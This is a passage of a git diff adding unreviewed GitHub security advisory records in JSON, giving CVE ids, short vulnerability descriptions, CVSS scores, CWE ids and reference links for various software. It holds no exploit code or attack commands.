a/advisories/unreviewed/2026/02/GHSA-qq4x-5chw-w95x/GHSA-qq4x-5chw-w95x.json b/advisories/unreviewed/2026/02/GHSA-qq4x-5chw-w95x/GHSA-qq4x-5chw-w95x.json new file mode 100644 index 0000000000000..b60d611af9acd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq4x-5chw-w95x/GHSA-qq4x-5chw-w95x.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq4x-5chw-w95x", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25345" + ], + "details": "Realtek IIS Codec Service 6.4.10041.133 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in the service configuration to inject malicious executables and escalate privileges on the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25345" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47642" + }, + { + "type": "WEB", + "url": "https://www.realtek.com/en" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/rtk-iis-codec-service-rtkiscodec-unquote-service-path" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq55-xggh-hmxg/GHSA-qq55-xggh-hmxg.json b/advisories/unreviewed/2026/02/GHSA-qq55-xggh-hmxg/GHSA-qq55-xggh-hmxg.json new file mode 100644 index 0000000000000..b8362a3483c5f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq55-xggh-hmxg/GHSA-qq55-xggh-hmxg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq55-xggh-hmxg", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-1405" + ], + "details": "The Slider Future plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'slider_future_handle_image_upload' function in all versions up to, and including, 1.0.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1405" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/slider-future/tags/1.0.5/slider-future.php#L177" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/34b52ca2-c05f-49b7-846f-a67136d7d379?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json b/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json new file mode 100644 index 0000000000000..00126b1233e55 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qq7g-427f-cm2r/GHSA-qq7g-427f-cm2r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq7g-427f-cm2r", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-1426" + ], + "details": "The Advanced AJAX Product Filters plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.9.6 via deserialization of untrusted input in the shortcode_check function within the Live Composer compatibility layer. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. Note: This vulnerability requires the Live Composer plugin to also be installed and active.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1426" + }, + { + "type": "WEB", + "url": "https://cwe.mitre.org/data/definitions/502.html" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L25" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L28" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woocommerce-ajax-filters/trunk/includes/compatibility/live_composer.php#L33" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3449344/#file418" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/29e76d57-217f-4f21-8bc6-a86290783a19?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json b/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json new file mode 100644 index 0000000000000..a1ff3a4c32013 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqhc-37jx-7gh5", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70095" + ], + "details": "A cross-site scripting (XSS) vulnerability in the item management and sales invoice function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70095" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70095.md" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqx4-ccm8-48mc/GHSA-qqx4-ccm8-48mc.json b/advisories/unreviewed/2026/02/GHSA-qqx4-ccm8-48mc/GHSA-qqx4-ccm8-48mc.json new file mode 100644 index 0000000000000..e6fc74beb2362 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqx4-ccm8-48mc/GHSA-qqx4-ccm8-48mc.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqx4-ccm8-48mc", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-13842" + ], + "details": "The Breadcrumb NavXT plugin for WordPress is vulnerable to authorization bypass through user-controlled key in versions up to and including 7.5.0. This is due to the Gutenberg block renderer trusting the $_REQUEST['post_id'] parameter without verification in the includes/blocks/build/breadcrumb-trail/render.php file. This makes it possible for unauthenticated attackers to enumerate and view breadcrumb trails for draft or private posts by manipulating the post_id parameter, revealing post titles and hierarchy that should remain hidden.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13842" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/breadcrumb-navxt/trunk/includes/blocks/build/breadcrumb-trail/render.php#L17" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3425008" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/62e25985-ac19-41a5-8027-eb053f4a6490?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json b/advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json new file mode 100644 index 0000000000000..4f846feafdaef --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qr83-6r38-ch55/GHSA-qr83-6r38-ch55.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qr83-6r38-ch55", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T18:30:24Z", + "aliases": [ + "CVE-2025-70981" + ], + "details": "CordysCRM 1.4.1 is vulnerable to SQL Injection in the employee list query interface (/user/list) via the departmentIds parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70981" + }, + { + "type": "WEB", + "url": "https://github.com/Tomikun2/SQL-Injection-in-CordysCRM/blob/main/README.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T18:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json new file mode 100644 index 0000000000000..a9069aad439a0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrj7-4954-7p6v", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1999" + ], + "details": "An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to merge their own pull request into a repository without having push access by exploiting an authorization bypass in the enable_auto_merge mutation for pull requests. This issue only affected repositories that allow forking as the attack relies on opening a pull request from an attacker-controlled fork into the target repository. Exploitation was only possible in specific scenarios. It required a clean pull request status and only applied to branches without branch protection rules enabled. This vulnerability affected GitHub Enterprise Server versions prior to 3.19.2, 3.18.5, and 3.17.11, and was fixed in versions 3.19.2, 3.18.5, and 3.17.11. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1999" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.11" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.5" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qrjv-2grw-rfj4/GHSA-qrjv-2grw-rfj4.json b/advisories/unreviewed/2026/02/GHSA-qrjv-2grw-rfj4/GHSA-qrjv-2grw-rfj4.json new file mode 100644 index 0000000000000..ef24c28e1e1fd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qrjv-2grw-rfj4/GHSA-qrjv-2grw-rfj4.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrjv-2grw-rfj4", + "modified": "2026-02-14T18:30:15Z", + "published": "2026-02-14T18:30:15Z", + "aliases": [ + "CVE-2026-23155" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: gs_usb: gs_usb_receive_bulk_callback(): fix error message\n\nSinc commit 79a6d1bfe114 (\"can: gs_usb: gs_usb_receive_bulk_callback():\nunanchor URL on usb_submit_urb() error\") a failing resubmit URB will print\nan info message.\n\nIn the case of a short read where netdev has not yet been assigned,\ninitialize as NULL to avoid dereferencing an undefined value. Also report\nthe error value of the failed resubmit.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23155" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/494fc029f662c331e06b7c2031deff3c64200eed" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/713ba826ae114ab339c9a1b31e209bebdadb0ac9" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8986cdf52f86208df9c7887fee23365b5d37da26" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/923379f1d7e3af8ccbf11edbbcf41f1bb3e9cfe6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aed58a28ea71a0d7d0947190fab1e3f4daa1d4a5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qrpm-ph3r-w26w/GHSA-qrpm-ph3r-w26w.json b/advisories/unreviewed/2026/02/GHSA-qrpm-ph3r-w26w/GHSA-qrpm-ph3r-w26w.json new file mode 100644 index 0000000000000..9d239322f6ddb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qrpm-ph3r-w26w/GHSA-qrpm-ph3r-w26w.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrpm-ph3r-w26w", + "modified": "2026-02-14T06:30:58Z", + "published": "2026-02-14T06:30:58Z", + "aliases": [ + "CVE-2026-1983" + ], + "details": "The SEATT: Simple Event Attendance plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.0. This is due to missing nonce validation on the event deletion functionality. This makes it possible for unauthenticated attackers to delete arbitrary events via a forged request granted they can trick an administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1983" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/simple-event-attendance/tags/1.5.0/seatt_events_admin.php#L23" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/simple-event-attendance/trunk/seatt_events_admin.php#L23" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cdfc1110-7bbd-45f0-97ef-271c45d222c1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T05:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qrx6-r62c-hcv3/GHSA-qrx6-r62c-hcv3.json b/advisories/unreviewed/2026/02/GHSA-qrx6-r62c-hcv3/GHSA-qrx6-r62c-hcv3.json new file mode 100644 index 0000000000000..7ec59db5efe34 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qrx6-r62c-hcv3/GHSA-qrx6-r62c-hcv3.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrx6-r62c-hcv3", + "modified": "2026-02-12T21:31:28Z", + "published": "2026-02-12T21:31:28Z", + "aliases": [ + "CVE-2025-70314" + ], + "details": "webfsd 1.21 is vulnerable to a Buffer Overflow via a crafted request. This is due to the filename variable", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70314" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Err0rzz/3afe49f54e1121b8a08a69801b61cfcc" + }, + { + "type": "WEB", + "url": "https://github.com/ourway/webfsd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qrxh-hqj2-g6xg/GHSA-qrxh-hqj2-g6xg.json b/advisories/unreviewed/2026/02/GHSA-qrxh-hqj2-g6xg/GHSA-qrxh-hqj2-g6xg.json new file mode 100644 index 0000000000000..ba548aff935ea --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qrxh-hqj2-g6xg/GHSA-qrxh-hqj2-g6xg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrxh-hqj2-g6xg", + "modified": "2026-02-16T12:30:24Z", + "published": "2026-02-16T12:30:24Z", + "aliases": [ + "CVE-2025-59904" + ], + "details": "Stored Cross-Site Scripting (XSS) vulnerability in Kubysoft, which is triggered through multiple parameters in the '/kForms/app' endpoint. This issue allows malicious scripts to be injected and executed persistently in the context of users accessing the affected resource.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:L/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59904" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-kubysoft" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T10:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvc7-4wrw-mpgp/GHSA-qvc7-4wrw-mpgp.json b/advisories/unreviewed/2026/02/GHSA-qvc7-4wrw-mpgp/GHSA-qvc7-4wrw-mpgp.json new file mode 100644 index 0000000000000..d45661ae5dd5e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvc7-4wrw-mpgp/GHSA-qvc7-4wrw-mpgp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvc7-4wrw-mpgp", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2023-38005" + ], + "details": "IBM Cloud Pak System 2.3.3.6, 2.3.3.7, 2.3.4.0, 2.3.4.1, and 2.3.5.0 could allow an authenticated user to perform unauthorized tasks due to improper access controls.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38005" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259955" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json b/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json new file mode 100644 index 0000000000000..37c01fdb58dfe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvhf-98cj-8779", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:13Z", + "aliases": [ + "CVE-2026-26731" + ], + "details": "TOTOLINK A3002RU V2.1.1-B20211108.1455 was discovered to contain a stack-based buffer overflow via the routernamer`parameter in the formDnsv6 function.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26731" + }, + { + "type": "WEB", + "url": "https://github.com/0xmania/cve/tree/main/TOTOLINK-A3002RU-boa-formDnsv6-StackOverflow" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T19:21:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json b/advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json new file mode 100644 index 0000000000000..f232b9034d423 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvpr-vq7h-28cr", + "modified": "2026-02-13T09:30:15Z", + "published": "2026-02-13T09:30:14Z", + "aliases": [ + "CVE-2026-0872" + ], + "details": "Improper Certificate Validation vulnerability in Thales SafeNet Agent for Windows Logon on Windows allows Signature Spoofing by Improper Validation.This issue affects SafeNet Agent for Windows Logon: 4.0.0, 4.1.1, 4.1.2.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:H/SI:H/SA:L/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0872" + }, + { + "type": "WEB", + "url": "https://supportportal.thalesgroup.com/csm?sys_kb_id=247fd4a42b4a7290061af3f5f291bff1&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=5ecb72c73b927610381ecfaf55e45a0b&sysparm_article=KB0030173" + }, + { + "type": "WEB", + "url": "https://thalesdocs.com/sta/agents/wla-windows_logon/wla-preinstallation_passwordless/index.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T09:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qw3h-8vxv-jf6c/GHSA-qw3h-8vxv-jf6c.json b/advisories/unreviewed/2026/02/GHSA-qw3h-8vxv-jf6c/GHSA-qw3h-8vxv-jf6c.json new file mode 100644 index 0000000000000..1692e0a9e70e4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qw3h-8vxv-jf6c/GHSA-qw3h-8vxv-jf6c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qw3h-8vxv-jf6c", + "modified": "2026-02-12T15:32:48Z", + "published": "2026-02-12T15:32:48Z", + "aliases": [ + "CVE-2026-2004" + ], + "details": "Missing validation of type of input in PostgreSQL intarray extension selectivity estimator function allows an object creator to execute arbitrary code as the operating system user running the database. Versions before PostgreSQL 18.2, 17.8, 16.12, 15.16, and 14.21 are affected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2004" + }, + { + "type": "WEB", + "url": "https://www.postgresql.org/support/security/CVE-2026-2004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1287" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json b/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json new file mode 100644 index 0000000000000..465c984583a48 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qw9p-rfpx-fxh5", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12075" + ], + "details": "The Order Splitter for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wos_troubleshooting' AJAX endpoint in all versions up to, and including, 5.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view information pertaining to other user's orders.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12075" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3387820%40woo-order-splitter&new=3387820%40woo-order-splitter&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/627eb000-086e-408a-8123-063fed6364be?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json b/advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json new file mode 100644 index 0000000000000..6aba968802fa1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qwvg-xq53-3vw2/GHSA-qwvg-xq53-3vw2.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qwvg-xq53-3vw2", + "modified": "2026-02-12T15:32:43Z", + "published": "2026-02-11T18:31:30Z", + "aliases": [ + "CVE-2025-70083" + ], + "details": "An issue was discovered in OpenSatKit 2.2.1. The DirName field in the telecommand is provided by the ground segment and must be treated as untrusted input. The program copies DirName into the local buffer DirWithSep using strcpy. The size of this buffer is OS_MAX_PATH_LEN. If the length of DirName is greater than or equal to OS_MAX_PATH_LEN, a stack buffer overflow occurs, overwriting adjacent stack memory. The path length check (FileUtil_AppendPathSep) is performed after the strcpy operation, meaning the validation occurs too late and cannot prevent the overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70083" + }, + { + "type": "WEB", + "url": "https://gist.github.com/jonafk555" + }, + { + "type": "WEB", + "url": "https://github.com/OpenSatKit/OpenSatKit" + }, + { + "type": "WEB", + "url": "https://github.com/OpenSatKit/OpenSatKit/releases/tag/v2.2.1" + }, + { + "type": "WEB", + "url": 